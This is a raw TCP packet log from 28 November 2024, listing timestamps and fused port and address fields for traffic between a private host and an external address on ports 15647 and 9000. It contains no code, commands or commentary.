                                          Nov 28, 2024 13:39:50.370629072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.370714903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.372100115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.422357082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.489384890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.489492893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.542227983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.619838953 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.620004892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.786664009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.786720991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.810745955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.810822964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.867803097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.867913008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.906672001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.930824995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.930891037 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.941392899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.984749079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.034697056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.034774065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.050880909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.050945044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.068892956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.109846115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.171049118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.171268940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.252166986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.252239943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.334634066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.334713936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.356214046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.372474909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.372649908 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.453450918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.453644037 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.454642057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.494404078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.494476080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.495055914 CET90004976445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.495198965 CET90004976445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.495332956 CET497649000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.495332956 CET497649000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.573664904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.573761940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.573776007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.610162973 CET497659000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.615308046 CET90004976445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.625356913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.682598114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.682773113 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.693753958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.695621967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.695702076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.730921984 CET90004976545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.731121063 CET497659000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.731306076 CET497659000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.815768957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.815848112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:51.851614952 CET90004976545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.939841986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:51.939929962 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.102678061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.102736950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.137130022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.137339115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.224370003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.224520922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.258673906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.258833885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.261236906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.312972069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.425723076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.425789118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.503434896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.503504038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.606669903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.606822968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.623569965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.623724937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.626708984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.672377110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.704607964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.704689980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.743814945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.824868917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.824965000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:52.866682053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.945003986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:52.945071936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.027332067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.027431011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.041482925 CET90004976545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.041647911 CET90004976545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.041809082 CET497659000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.041809082 CET497659000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.106700897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.106755972 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.146341085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.146410942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.147376060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.157984018 CET497669000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.161815882 CET90004976545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.226721048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.226769924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.266598940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.266705990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.277928114 CET90004976645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.278047085 CET497669000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.278134108 CET497669000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.310694933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.347151041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.347235918 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.387079954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.398361921 CET90004976645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.428322077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.428414106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.467163086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.467216015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.549141884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.549213886 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.549285889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.590822935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.590883970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.591542959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.670878887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.671047926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.714107037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.714291096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.753355026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.797240019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.834680080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.834839106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.835688114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.870527029 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.922375917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:53.993191957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:53.993275881 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.037149906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.037333012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.154726028 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.154778957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.156121969 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.159307003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.203488111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.277560949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.277621984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.315284967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.359839916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.479032993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.479118109 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.500356913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.559920073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.560019970 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.599144936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.599209070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.680047035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.680104971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.680469036 CET90004976645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.680629969 CET497669000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.680691957 CET90004976645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.680737019 CET497669000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.681440115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.719804049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.719856024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.782195091 CET497679000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.800440073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.800560951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.800607920 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.800789118 CET90004976645.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.840605974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.840703011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.902206898 CET90004976745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.902297020 CET497679000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.902507067 CET497679000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.920686960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.920861959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:54.960777998 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:54.960959911 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.001629114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.001724005 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.023112059 CET90004976745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.040873051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.041052103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.041969061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.094136953 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.122248888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.122345924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.162014008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.162098885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.242253065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.242346048 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.286678076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.286722898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.288172007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.323533058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.323601961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.406675100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.406737089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.407790899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.443304062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.443485022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.502628088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.502695084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.527482986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.566271067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.566385031 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.608028889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.608206987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.666666031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.666738033 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.686456919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.728138924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.728209019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.728601933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.781667948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.809113026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.809303999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.887675047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.887737989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:55.970935106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:55.971040964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.007924080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.008022070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.050882101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.050967932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.092525005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.128118038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.128187895 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.130661964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.130760908 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.209386110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.209481955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.306618929 CET90004976745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.306747913 CET90004976745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.306802988 CET497679000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.306828022 CET497679000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.322715044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.322788000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.329374075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.329457045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.329467058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.422872066 CET497689000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.426804066 CET90004976745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.442857981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.442914963 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.449480057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.451035023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.500370026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.530776978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.531030893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.542819977 CET90004976845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.543026924 CET497689000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.543081045 CET497689000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.606658936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.606817961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.644077063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.644185066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.651120901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.663204908 CET90004976845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.727052927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.727130890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.731745005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.781634092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.822763920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.822901964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.847194910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.847250938 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.852416992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.906615019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.928400993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:56.928497076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:56.967369080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.048448086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.048521042 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.094649076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.094719887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.129664898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.129755974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.168803930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.168872118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.217432022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.217533112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.249687910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.297244072 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.310637951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.310709000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.369743109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.369967937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.452867031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.452943087 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.454999924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.460412979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.500426054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.538738966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.538815022 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.573041916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.611890078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.612034082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.658771038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.658826113 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.691416979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.691483974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.778630972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.778728008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.778775930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.812081099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.856776953 CET90004976845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.857091904 CET90004976845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.857156038 CET497689000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.859859943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.860003948 CET497689000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.860057116 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.933408022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:57.933500051 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.969660044 CET497699000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:57.979928970 CET90004976845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.034790039 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.034868002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.053529024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.053594112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.061058998 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.089715004 CET90004976945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.089838028 CET497699000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.089998007 CET497699000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.109774113 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.134831905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.134936094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.174027920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.174074888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.209971905 CET90004976945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.254858971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.254971981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.298366070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.298434973 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.377046108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.377243996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.458667040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.458719015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.497765064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.497840881 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.499605894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.547394991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.619790077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.620022058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.667682886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:58.667836905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:58.743854046 CET156474973045.141.84.168192.168.2.4
